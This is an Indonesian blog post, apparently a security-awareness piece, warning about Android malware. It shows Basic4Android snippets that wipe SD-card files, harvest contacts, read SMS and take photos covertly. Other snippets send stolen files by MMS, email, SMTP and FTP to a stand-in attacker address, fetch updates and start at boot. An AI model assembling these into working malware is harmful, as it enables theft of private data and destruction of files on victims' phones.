Ancaman berbahaya pengguna Android

Tidak ada sistem yang aman 100%, begitu juga pada mobile bersistem android yang disebut-sebut sebagai "Smart Phone", "Berbasis Linux" atau apapun sebutannya tetapi tetap saja tidak menjamin aman walaupun banyak juga command-command yang sudah tidak dapat digunakan lagi di android versi terbarunya.
Saya tidak mengajarkan cara membuat malware di Android, tetapi hanya memberitahukan bahwa malware di Android bisa sangat berbahaya dan mengganggu privasi penggunanya walaupun androidnya tidak di-Root tetapi malware tetap bisa bersenang-senang.
Di sini saya menggunakan Development tool Basic4Android untuk memberikan contoh kode-kode berbahayanya.

Basic4Android juga memiliki banyak file library pendukung yang dapat disalah gunakan untuk membuat program jahat di Android

SQL databases
GPS
Serial ports (Bluetooth)
Camera
XML parsing
Web services (HTTP)
Services (background tasks)
JSON
Animations
Network (TCP and UDP)
Text To Speech (TTS)
Voice Recognition
WebView
AdMob (ads)
Charts
OpenGL
Graphics

dan masih banyak lagi

Sayangnya tool ini belum begitu populer, tetapi dapat membangun aplikasi android yang powerful.
Di sini memang lebih banyak contoh-contoh potongan kodenya daripada gambar screenshot, tetapi kode lebih penting untuk pembuktian daripada screenshot karena program dibangun dengan kode.


Library Core
Di dalam library ini terdapat banyak sekali kode-kode yang mudah digunakan untuk membuat "malicious code" yang umum dimiliki malware.

Code:

Dim SDCard As List
Dim HapusFile As String
SDCard.Initialize
SDCard.AddAll(File.ListFiles(File.DirRootExternal))
For i= SDCard.Size-1 To 0 Step -1
HapusFile = SDCard.Get(i)
File.Delete(File.DirRootExternal, HapusFile)
Next

Menghapus semua file yang ada di SDCard.

Code:

File.WriteString(Folder, NamaFile, "ISI FILE")

Menulis ke sebuah file.

Code:

File.ReadString(Folder, NamaFile)

Membaca isi data dari suatu file.

Code:

Sub KirimMMS(NomerTelepon As String, Pesan As String, Lokasi As String, NamaFile As String)
Dim iIntent As Intent
iIntent.Initialize("android.intent.action.SEND_MSG", "")
iIntent.setType("vnd.android-dir/mms-sms")
iIntent.PutExtra("android.intent.extra.STREAM", BuatUri("file://" & File.Combine(Lokasi, NamaFile)))
iIntent.PutExtra("sms_body", Pesan)
iIntent.PutExtra("address", NomerTelepon)
iIntent.SetType("image/png")
StartActivity(iIntent)
End Sub
Sub BuatUri(uri As String) As Object
Dim r As Reflector
Return r.RunStaticMethod("android.net.Uri", "parse", Array As Object(uri), Array As String("java.lang.String"))
End Sub

Kode-kode ini untuk mengirim MMS dengan tambahan file ke nomer yang dituju.
Dapat digunakan untuk mencuri file-file penting ke nomer telepon penyerang.

Library Audio
Library ini digunakan untuk hal-hal yang berhubungan dengan suara atau audio seperti merekam suara, mengeluarkan suara Beep, memutar musik, merekam video dan lain-lain.

Code:

Dim suara As Beeper
suara.Beep

Memutar sound dengan pilihan suara alarm, musik, notifikasi, ring, system, Voice call.
Apa akibatnya jika kode ini digunakan untuk kejahatan seperti memutar sound berulang-ulang tanpa sebab? Tentu saja pengguna android tersebut bingung dan panik sambil berkata "Kenapa nih handphone gua?"

Code:

Dim LoadSuara As SoundPool
LoadSuara.Load(Folder, NamaFile)

Load file sound berjenis WAV.
Kode ini bisa digunakan untuk menjahili korban yang lebih menakutkan lagi dengan menggunakan suara dari file WAV buatan sendiri yang berisi suara menakutkan atau konyol.

Library Camera
Library ini digunakan untuk mengambil gambar/foto melalui kamera.

Code:

Dim Kamera As Camera
Kamera.StartPreview
Kamera.TakePicture

Mengambil gambar dari kamera.
Bayangkan saja jika android korban tiba-tiba mengambil foto sendiri.

Library Phone
Inilah library yang paling berbahaya jika digunakan untuk kejahatan dan sangat mengganggu privasi korban karena di library ini segala yang berhubungan dengan informasi telepon, panggilan telepon, sms, nomer telepon, baca inbox sms, mengirim sms, mengirim email, dan lain-lain dapat dengan mudah disalahgunakan.

Code:

Dim kontak As Contact
Dim acaknomerHP As Int
Dim nomerHP As String
For i = 0 To daftar.Size - 1
kontak = daftar.Get(i)
nomerHP = ""
Msgbox("DisplayName : " & kontak.DisplayName & CRLF & "Name : " & kontak.Name & CRLF & "size : " & kontak.GetPhones.Size, "nama")
If (kontak.DisplayName.Contains("@") = False) AND (kontak.DisplayName.Contains(".") = False) AND (kontak.Name.Trim <> "") AND (kontak.GetPhones.Size > 0) Then
If kontak.GetPhones.GetValueAt(0) = kontak.PHONE_MOBILE Then
nomerHP = kontak.GetPhones.GetKeyAt(0)
nomerHP = nomerHP.Trim
nomerHP = nomerHP.Replace("-", "")
If IsNumber(nomerHP) = True Then
Msgbox(i & CRLF & kontak.DisplayName & CRLF & nomerHP,"")
End If
End If
End If
Next

Kode-kode ini untuk membaca semua nama dan nomer HP orang-orang yang ada di Phone book HP korban.

Code:

Dim KirimSms As PhoneSms
KirimSms.Send(NomerTelepon, IsiSMS)

Kode ini untuk mengirim SMS ke nomer yang dituju.
Bayangkan jika kode ini digunakan untuk mengirim SMS iseng ke nomer telepon orang-orang yang ada di phone book korban, sudah begitu dapat membuang-buang pulsa. Mengerikan!

Code:

Dim PanggilanTelepon As PhoneCalls
StartActivity(PanggilanTelepon.Call(NomerTelepon))

Kode ini untuk membuat panggilan ke nomer yang dituju.
Bayangkan jika HP korban tiba-tiba mencoba menelepon diam-diam ke nomer orang-orang yang ada di buku telepon korban.

Code:

Dim BacaSMSmasuk As SmsMessages
BacaSMSmasuk.GetUnreadMessages

Kode ini dapat dikembangkan lagi untuk membaca SMS masuk yang belum terbaca.

Code:

Dim KirimEmail As Email
KirimEmail.To.Add("penyerang@malware.com")
KirimEmail.Attachments.Add(File.Combine(File.DirRootExternal, "filecurian.jpg"))
StartActivity(KirimEmail.GetIntent)

Kode-kode ini digunakan untuk mengirim pesan+Attachment file ke alamat email yang dituju.
Bayangkan jika kode ini digunakan untuk mengirim file-file penting ke email penyerang?

Library NET
Library ini digunakan untuk hal-hal yang berhubungan dengan FTP, SMTP, POP3.

Code:

Dim s As SMTP
s.Initialize(Server, Port, NamaUser, Password, NamaEvent)
s.To.Add("penyerang@malware.com")
s.Subject = "Tes"
s.Body = "Tes kirim pesan lewat SMTP"
s.AddAttachment(LokasiFile, NamaFile)
s.Send

Kode-kode ini untuk mengirim pesan beserta Attachment file melalui SMTP.
Jika mengirim file lewat MMS atau Email gagal, maka cara ini dapat digunakan untuk mencuri file-file pribadi ke email penyerang.

Code:

Dim rudi As FTP
rudi.Initialize(NamaEvent, Host, Port, User, Password)
rudi.DownloadFile(PathFileServer, JenisAscii, Folder, NamaFile)
rudi.Close

Kode ini digunakan untuk download file melalui FTP.
Bayangkan jika kode ini digunakan untuk mengupdate malware dengan mendownloadnya dari server penyerang ke device atau SDCard korban.

Code:

Dim rudi As FTP
rudi.Initialize(NamaEvent, Host, Port, User, Password)
rudi.UploadFile(Folder, NamaFile, JenisAscii, PathFileServer)
rudi.Close

Kode ini digunakan untuk upload file melalui FTP.
Bagaimana jika kode ini digunakan sebagai alternatif lain dari MMS, Email, SMTP untuk mencuri file korban dan diupload ke server penyerang?

Library Network
Library ini memiliki dua obyek untuk TCP yaitu "Socket" dan "ServerSocket".

• Socket digunakan untuk berkomunikasi dengan device lain dan komputer lain melalui TCP/IP.
• ServerSocket digunakan untuk listen/mendengarkan datangnya koneksi.
  

Jadi kesimpulannya library ini dapat digunakan untuk membuat program remote atau RAT.

Masih banyak lagi kode-kode dan library lain yang dapat disalah gunakan.


Booting
Setiap malware umumnya dijalankan kembali ketika booting seperti di-restart.
Sistem operasi android juga dapat menjalankan suatu program secara otomatis ketika android booting. Lagi-lagi ini dapat disalahgunakan untuk menjalankan malware ketika handphone dihidupkan.
Basic4Android memiliki cara yang mudah jika aplikasi yang dibuat ingin dijalankan kembali ketika android booting, caranya:

1. Klik menu Project > Add New Module > Service Module
2. Beri nama untuk module tersebut
3. Pada kode #StartAtBoot: False ubah nilai False menjadi True seperti kode berikut ini:
   
   Code:
   

   #Region  Service Attributes
    #StartAtBoot: True
#End Region

Ketika android dihidupkan, aplikasi yang dijalankan saat booting tidak akan tampil di daftar Aplikasi aktif seperti gambar berikut ini

tetapi dapat terlihat di daftar aplikasi Berjalan atau service seperti gambar berikut ini

Bagaimanapun juga, aplikasi di android harus di-install terlebih dahulu sebelum digunakan dan program installer android memiliki sistem analisa ketika ada aplikasi yang ingin di-install, jadi analisanya akan memberitahukan apa yang dapat dilakukan aplikasi tersebut ketika sudah terinstall seperti gambar berikut ini

Sudah begitu, setelah menginstall aplikasinya maka akan didaftarkan ke dalam daftar aplikasi pihak ketiga yang terinstall seperti gambar berikut ini

Apapun aplikasinya termasuk malware, tetap dapat diuninstall walaupun aplikasi tersebut masih berjalan tetapi dapat dipaksa berhenti kemudian menghapus aplikasi yang terinstall tersebut dengan mudah seperti gambar berikut ini

Itulah sebabnya jika ada malware di android umumnya berpura-pura menjadi aplikasi yang seolah-olah berguna seperti aplikasi game, unik, konyol, jorok, dan lain-lain sebagai teknik sosial untuk menjebak korbannya agar menginstall aplikasi tersebut.

Berhati-hatilah jika ingin install aplikasi dari pihak ketiga. Malware di android bisa sama berbahayanya seperti malware di windows.

• Tweet
• Share
• Share
• Share
• Share

About Admin MC3

This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.

Related Post